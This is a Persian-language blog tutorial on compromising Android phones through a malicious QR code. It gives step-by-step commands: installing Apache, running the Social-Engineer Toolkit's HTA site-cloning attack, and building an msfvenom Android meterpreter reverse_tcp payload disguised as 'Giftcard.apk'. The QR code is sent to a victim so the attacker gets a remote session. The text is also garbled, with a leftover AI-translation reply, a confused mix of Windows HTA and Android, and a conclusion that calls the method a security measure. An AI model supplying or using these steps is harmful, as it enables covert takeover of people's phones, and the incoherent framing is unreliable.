هک گوشی اندروید با استفاده از کد کیوآر (کد QR)
با اجازهی شما، میخواهم با یک اخطار آغاز کنم: روشی که قصد دارم توضیح دهم یکی از چندین روش موجود است. ین روش بهطور کامل خودکار نیست و نقشی در این فرآیند دارد. به همین دلیل، مهندسی اجتماعی جزء حیاتی آن است. مهندسی اجتماعی برای هک به فرآیندی اشاره دارد که در آن مهاجمان با بهرهگیری از تکنیکهای مهندسی اجتماعی، سعی در کسب دسترسی به اطلاعات حساس یا نفوذ به سیستمهای کامپیوتری دارند. این تکنیکها شامل ارتباط با افراد، فریبهای اجتماعی و استفاده از روانشناسی افراد میشوند. همچنین، این روش ممکن است بر روی همه دستگاههای اندرویدی بهصورت موفقیتآمیز کار نکند. تنظیمات امنیتی، وجود نرمافزارهای ضد ویروس و مکانیزمهای امنیتی ارائهشده توسط گوگل تنها چندی از موانع ممکن را برای حملههای موفق ایجاد میکنند.
بیشتر بخوانید:
- چگونگی هک اندروید با فرستادن لینک
- معرفی ۲۰ برنامه هک گوشی اندرویدی
- گام به گام آموزش شروع کار با ابزار ترموکس برای هک گوشیهای اندروید
- آموزش گام به گام هک گوشی با دانلود برنامه Hackode
- هک گوشی با کد ملی
کد QR چیست؟
کد پاسخ سریع یا کد QR یک نوع ماتریسی بارکد است که توسط شرکت ژاپنی Denso Wave ابداع شده است. این کدها به شکل یک تصویر مربعی از الگوهای سیاه و سفید تشکیل شدهاند که اطلاعات مختلفی را به صورت دیجیتالی ذخیره میکنند. عبارت QR نیز از اصطلاح “Quick Response” به معنای پاسخ سریع گرفته شده است، زیرا اطلاعات موجود در این کدها به سرعت توسط دستگاههای مختلف خوانده میشوند.
تاریخچه و ایجاد کد کیوآر
کد کیوآر در سال 1994 توسط شرکت Denso Wave اختراع شد. ابتدا برای پیگیری وسایل نقلیه در فرآیند تولید بهکار میرفت، اما سریعاً برای استفادههای متعدد دیگر مورد استفاده قرار گرفت. این شرکت تولید کننده محصولات شناسایی خودکار و رباتهای صنعتی بود که به دنبال ابداع یک روش سریع و مؤثر برای تبادل اطلاعات بود.
نحوه کار کد کیوآر
کدهای کیوآر به وسیلهٔ الگوهای مختلفی از ماژولها (نقاط سیاه و سفید) تشکیل میشوند. هر کد کیوآر از یک مربع اصلی تشکیلشده است که اطلاعات درون آن قرار میگیرد. اطلاعات ذخیرهشده در کد کیوآر به صورت دیجیتالی و باینری است و میتوانند متن، لینک، اطلاعات تماس و غیره باشند.
کاربردهای کد کیوآر
کدهای کیوآر در زمینههای مختلفی از جمله تبلیغات، مدیریت محصولات، امنیت، اطلاعرسانی و… استفاده میشوند. این کدها میتوانند بر روی محصولات، بلیطها، کارتها، بروشورها و حتی وسایل تبلیغاتی قرار گیرند. با اسکن کد کیوآر توسط دوربین تلفنهوشمند یا دستگاههای خوانندهی مخصوص، اطلاعات مختلفی مانند لینکها، اطلاعات تماس، توضیحات محصولات و… قابل دسترسی میشوند.
باشه، متن را مطابق درخواست شما و بهینهسازی شده برای موتورهای جستجو (SEO) به زبان فارسی ترجمه میکنم:
دوستان عزیز، در این مقاله به شما اسپای۲۴ کامل را ارائه خواهیم داد که نشان میدهد چگونه افراد حملهکننده با استفاده از کد QR و تکنیکهای حمله HTA تلفنهای هوشمند اندرویدی را هک میکنند. برای انجام این کار، نیازمند استفاده از سیستم عامل کالی لینوکس خواهیم بود. ما فکر میکنیم که بسیاری از مردم با مفهوم کد QR آشنا هستند، بنابراین ما تمرکز خود را تنها بر روی توضیح تکنیک حمله HTA قرار خواهیم داد. پیش از ورود به موضوع اصلی، به بررسی این تکنیک خواهیم پرداخت.
حمله HTA چیست؟
روش حمله HTA به ما امکان میدهد یک سایت را کلون کنیم و از طریق فایلهای HTA تزریق PowerShell را انجام دهیم. این فایلها برای بهرهبرداری از قابلیت PowerShell مبتنی بر ویندوز از طریق مرورگر استفاده میشوند. این برنامههای کاربردی به زبان HTML ساده نوشته میشوند و به حملهکننده از راه دور دسترسی کامل به سیستم را ممکن میسازند. پسوند معمول فایلهای HTA به .hta است.
بیایید به این موضوع نگاهی دقیقتر داشته باشیم! 😛
نصب وب سرور آپا چی
این به عنوان یک وابستگی در همهچیزی که ابتدا دانلود میکنیم، ضروری است. به یک وبسرور برای میزبانی فایل مخرب HTA نیاز داریم، به همین دلیل از دستور زیر برای دانلود وبسرور آپاچی استفاده میکنیم.
apt install apache2
ابزار Social-Engineer Toolkit (SET)
Setookit در حالت پیشفرض در Kali Linux وجود دارد و این ابزار خودکار طراحی شده است تا بارگیری را ایجاد کرده و حملههای پیشرفته را انجام دهد. به راحتی میتوانیم با استفاده از دستور زیر این ابزار را راهاندازی کنیم. پس از باز کردن ابزار، دکمه 1 را فشار داده و گزینه اول را انتخاب کنید.
git clone https://github.com/Pr0f3ssor/SETOOLKIT.git
cd SETOOLKIT
pip3 install -r requirements.txt
python setup.py
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
حالا دکمه 2 را فشار داده و گزینه دوم “Website Attack Vectors” را انتخاب کنید.
نزدیکی 😛 !! به مقصد رسیدهایم. فقط دکمه 7 را فشار داده و حمله HTA را انتخاب کنید.
حالا در اینجا سه گزینه دریافت میکنیم که از طریق گزینه اول تنها میتوانیم الگوی پیشفرض را انتخاب کنیم، گزینه دوم به ما امکان کلون کردن هر برنامه وب را میدهد و میتوانیم با انتخاب گزینه سوم الگوی وب سفارشی خود را وارد کنیم. در مورد ما، ما از گزینه دوم برای کلون برنامه وب استفاده خواهیم کرد.
حالا آدرس URL را وارد میکنیم که میخواهیم کلون کنیم و سپس آدرس localhost همراه با شماره پورت را وارد میکنیم.
خوب 😛 !! میتوانید ببینید که نیازی به اضافه کردن تلاشهای اضافی نداریم زیرا همه چیز به صورت خودکار انجام میشود.
ایجاد Payload اندروید
همزمان یک ترمینال جدید را باز کنید، به پوشه ریشه وبسرور آپاچی بروید و با استفاده از دستور دادهشده در آنجا payload ایجاد کنید. پس از ایجاد payload، فایل “index.html” را با استفاده از دستور nano باز کنید.
cd /var/www/html/
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 R > Giftcard.apk
ls -l
nano index.html
حالا باید نام منبع “Launcher .hta” را به “Giftcard.apk” تغییر دهیم که با این نام ابتدا payload ایجاد کردهایم.
ایجاد کد QR
حالا باید افزونه را در مرورگر کروم خود نصب کنید تا کد QR وبسرور خود را دریافت کنید. میتوانید آن را از اینجا نصب کنید.
تنها کاری که باید انجام دهید، باز کردن آدرس IP وبسرور آپاچی خود در هر کجا، بر روی افزونه کلیک کرده و کد QR را که میتوانید به قربانی ارسال کنید، دریافت کنید.
صبر کنید 😛 !! یکبار قربانی کد QR را که توسط حملهکننده ارائه شده است اسکن کند، بارگیری مخرب در دستگاه اندرویدی ظاهر میشود.
عالی 😛 !! و به محض اینکه قربانی بارگیری را دانلود و نصب میکند، ما جلسه meterpreter دستگاه او را دریافت میکنیم.
به همان شیوه، میتوانید با استفاده از تکنیکهای مهندسی اجتماعی و ایدههای خود قربانی را فریب بدهید.
نکات امنیتی هنگام استفاده از کد QR برای هک گوشی
اگر قصد دارید از کد QR برای افزایش امنیت گوشیتان استفاده کنید، باید توجه داشته باشید:
- منبع معتبر: همواره اطمینان حاصل کنید که کد QR از منبع معتبری تولید شده است.
- اطلاعات کمتر: از کدهای QR با اطلاعات کمتر استفاده کنید تا جلوگیری از اشتباهات امنیتی.
- بررسی قبل از اسکن: هرگز کد QR را بدون بررسی اسکن نکنید، به خصوص اگر از منبع ناشناختهای تولید شده باشد.
نتیجه گیری:
استفاده از کد کیوآر (QR) به عنوان یک روش افزایش امنیت گوشی اندرویدی میتواند بسیار مفید باشد. با رعایت نکات امنیتی و انجام مراحل مذکور، میتوانید از امنیت دستگاه خود اطمینان حاصل کنید. همچنین، هرگز از اشتراکگذاری کد QRهای حاوی اطلاعات محرمانهای خودداری کنید.
پرسشهای متداول
چگونه میتوانم مطمئن شوم که کد QR از منبع امنیتی تولید شده است؟
بهتر است کد QR را تنها از منابع معتبر و اطمینانبخش دریافت کنید. از اسکن کد QRهای ناشناخته اجتناب کنید.
آیا امکان دارد که کد QR من به صورت غیرمجاز استفاده شود؟
بله، اگر کسی به کد QR شما دسترسی پیدا کند، میتواند از آن به نفع خود استفاده کند. بهتر است هرگز کد QR حاوی اطلاعات حساس را به اشتراک نگذارید.
آیا اپلیکیشنهای خواندن کد QR امنیت اطلاعات من را تامین میکنند؟
بیشتر اپلیکیشنهای خواندن کد QR تلاش میکنند اطلاعات شما را محافظت کنند، اما باید از منابع معتبر و قابل اعتماد استفاده کنید.
آیا نیاز به نصب آنتیویروس برای گوشی دارم؟
بله، نصب یک برنامه آنتیویروس باعث افزایش امنیت دستگاه شما در برابر تهدیدات امنیتی مختلف، از جمله حملات کد QR، خواهد شد.
چگونه میتوانم از دسترسیهای اشتباهی به دوربین و میکروفون جلوگیری کنم؟
با اجازهنامههای دسترسی به دوربین و میکروفون در برنامهها به دقت برخورد کنید و فقط به برنامههای معتبر دسترسی بدهید.
چگونه میتوانم از اسکن کد QR از طریق دوربین جلوگیری کنم؟
میتوانید از تنظیمات دستگاه خود استفاده کنید تا دسترسی دوربین به برنامهها و وبسایتها را محدود کنید.